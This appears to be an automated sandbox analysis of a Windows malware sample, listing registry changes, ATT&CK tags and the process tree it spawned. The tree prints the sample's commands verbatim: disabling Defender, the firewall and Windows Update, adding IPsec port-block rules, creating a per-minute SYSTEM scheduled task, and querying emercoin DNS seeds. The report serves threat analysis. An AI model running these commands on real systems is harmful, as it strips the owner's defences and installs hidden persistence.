Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	zthqhle.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	zthqhle.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	zthqhle.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{98CAD950-072A-4C8C-B658-B939D5D9FC08}\WpadNetworkName = "Network 3"	zthqhle.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	zthqhle.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	zthqhle.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	zthqhle.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{98CAD950-072A-4C8C-B658-B939D5D9FC08}\WpadDecisionTime = 0010445e1a51db01	zthqhle.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	zthqhle.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1e-f1-56-4b-64-c9\WpadDecisionReason = "1"	zthqhle.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0168000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	zthqhle.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{98CAD950-072A-4C8C-B658-B939D5D9FC08}	zthqhle.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	zthqhle.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{98CAD950-072A-4C8C-B658-B939D5D9FC08}\WpadDecisionReason = "1"	zthqhle.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{98CAD950-072A-4C8C-B658-B939D5D9FC08}\WpadDecision = "0"	zthqhle.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{98CAD950-072A-4C8C-B658-B939D5D9FC08}\1e-f1-56-4b-64-c9	zthqhle.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1e-f1-56-4b-64-c9\WpadDecisionTime = 0010445e1a51db01	zthqhle.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	zthqhle.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	zthqhle.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
844	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1564	schtasks.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
2184	zthqhle.exe
2172	zthqhle.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2972	ivtowqsrxkbhlqw7487.exe
2772	zthqhle.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
Token: SeDebugPrivilege	2392	zthqhle.exe
Token: SeDebugPrivilege	2772	zthqhle.exe
Token: SeAuditPrivilege	2080	svchost.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
2160	hentai.exe
3000	koaaya.exe
2392	zthqhle.exe
2828	hentai.exe
2772	zthqhle.exe
2512	hentai.exe
2972	ivtowqsrxkbhlqw7487.exe
2184	zthqhle.exe
1932	hentai.exe
2172	zthqhle.exe
2828	hentai.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 2160	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe	30
PID 2712 wrote to memory of 2160	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe	30
PID 2712 wrote to memory of 2160	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe	30
PID 2712 wrote to memory of 2160	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe	30
PID 2712 wrote to memory of 1748	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe	31
PID 2712 wrote to memory of 1748	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe	31
PID 2712 wrote to memory of 1748	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe	31
PID 2712 wrote to memory of 1748	2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe	31
PID 1748 wrote to memory of 844	1748	cmd.exe	34
PID 1748 wrote to memory of 844	1748	cmd.exe	34
PID 1748 wrote to memory of 844	1748	cmd.exe	34
PID 1748 wrote to memory of 844	1748	cmd.exe	34
PID 1748 wrote to memory of 2392	1748	cmd.exe	35
PID 1748 wrote to memory of 2392	1748	cmd.exe	35
PID 1748 wrote to memory of 2392	1748	cmd.exe	35
PID 1748 wrote to memory of 2392	1748	cmd.exe	35
PID 2392 wrote to memory of 2828	2392	zthqhle.exe	36
PID 2392 wrote to memory of 2828	2392	zthqhle.exe	36
PID 2392 wrote to memory of 2828	2392	zthqhle.exe	36
PID 2392 wrote to memory of 2828	2392	zthqhle.exe	36
PID 2772 wrote to memory of 2512	2772	zthqhle.exe	38
PID 2772 wrote to memory of 2512	2772	zthqhle.exe	38
PID 2772 wrote to memory of 2512	2772	zthqhle.exe	38
PID 2772 wrote to memory of 2512	2772	zthqhle.exe	38
PID 2772 wrote to memory of 2972	2772	zthqhle.exe	39
PID 2772 wrote to memory of 2972	2772	zthqhle.exe	39
PID 2772 wrote to memory of 2972	2772	zthqhle.exe	39
PID 2772 wrote to memory of 2972	2772	zthqhle.exe	39
PID 2772 wrote to memory of 2796	2772	zthqhle.exe	40
PID 2772 wrote to memory of 2796	2772	zthqhle.exe	40
PID 2772 wrote to memory of 2796	2772	zthqhle.exe	40
PID 2772 wrote to memory of 2796	2772	zthqhle.exe	40
PID 2772 wrote to memory of 2528	2772	zthqhle.exe	42
PID 2772 wrote to memory of 2528	2772	zthqhle.exe	42
PID 2772 wrote to memory of 2528	2772	zthqhle.exe	42
PID 2772 wrote to memory of 2528	2772	zthqhle.exe	42
PID 2772 wrote to memory of 1956	2772	zthqhle.exe	44
PID 2772 wrote to memory of 1956	2772	zthqhle.exe	44
PID 2772 wrote to memory of 1956	2772	zthqhle.exe	44
PID 2772 wrote to memory of 1956	2772	zthqhle.exe	44
PID 2772 wrote to memory of 1616	2772	zthqhle.exe	46
PID 2772 wrote to memory of 1616	2772	zthqhle.exe	46
PID 2772 wrote to memory of 1616	2772	zthqhle.exe	46
PID 2772 wrote to memory of 1616	2772	zthqhle.exe	46
PID 1616 wrote to memory of 2376	1616	cmd.exe	48
PID 1616 wrote to memory of 2376	1616	cmd.exe	48
PID 1616 wrote to memory of 2376	1616	cmd.exe	48
PID 1616 wrote to memory of 2376	1616	cmd.exe	48
PID 1616 wrote to memory of 1564	1616	cmd.exe	49
PID 1616 wrote to memory of 1564	1616	cmd.exe	49
PID 1616 wrote to memory of 1564	1616	cmd.exe	49
PID 1616 wrote to memory of 1564	1616	cmd.exe	49
PID 2772 wrote to memory of 1968	2772	zthqhle.exe	50
PID 2772 wrote to memory of 1968	2772	zthqhle.exe	50
PID 2772 wrote to memory of 1968	2772	zthqhle.exe	50
PID 2772 wrote to memory of 1968	2772	zthqhle.exe	50
PID 2772 wrote to memory of 1408	2772	zthqhle.exe	52
PID 2772 wrote to memory of 1408	2772	zthqhle.exe	52
PID 2772 wrote to memory of 1408	2772	zthqhle.exe	52
PID 2772 wrote to memory of 1408	2772	zthqhle.exe	52
PID 2772 wrote to memory of 2952	2772	zthqhle.exe	54
PID 2772 wrote to memory of 2952	2772	zthqhle.exe	54
PID 2772 wrote to memory of 2952	2772	zthqhle.exe	54
PID 2772 wrote to memory of 2952	2772	zthqhle.exe	54

C:\Users\Admin\AppData\Local\Temp\ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
"C:\Users\Admin\AppData\Local\Temp\ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Users\Admin\AppData\Local\Temp\hentai.exe
  C:\Users\Admin\AppData\Local\Temp\hentai.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\zhquqleq\zthqhle.exe
  2⤵
  - Loads dropped DLL
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:844
- - C:\Windows\zhquqleq\zthqhle.exe
    C:\Windows\zhquqleq\zthqhle.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\hentai.exe
      C:\Users\Admin\AppData\Local\Temp\hentai.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2828

C:\Windows\SysWOW64\koaaya.exe
C:\Windows\SysWOW64\koaaya.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3000

C:\Windows\zhquqleq\zthqhle.exe
C:\Windows\zhquqleq\zthqhle.exe
1⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Indicator Removal: Clear Persistence
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2772
- C:\Windows\TEMP\hentai.exe
  C:\Windows\TEMP\hentai.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2512
- C:\Windows\zhquqleq\ivtowqsrxkbhlqw7487.exe
  C:\Windows\zhquqleq\ivtowqsrxkbhlqw7487.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2972
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static delete all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:2796
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2528
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "luauuzqtv" /ru system /tr "cmd /c C:\Windows\Fonts\zthqhle.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2376
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "luauuzqtv" /ru system /tr "cmd /c C:\Windows\Fonts\zthqhle.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1564
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:1968
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:1408
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2952
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2300
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2176
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:1080
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:2056
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:1368
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:1256
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:1608
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2216
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:2204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:2008
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1752
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:2120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2408
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:2348
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    PID:1556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3056
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:468
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:2380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2100
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:1748
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:2828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2452
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:3024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2492
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2464
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2544
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1900
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin seed1.emercoin.com
  2⤵
  - System Location Discovery: System Language Discovery
  PID:380
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin seed1.emercoin.com
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2296
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin seed2.emercoin.com
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1240
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin seed2.emercoin.com
    3⤵
    PID:1664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 161.97.219.84
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2688
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 161.97.219.84
    3⤵
    PID:1224
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 163.172.168.171
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1928
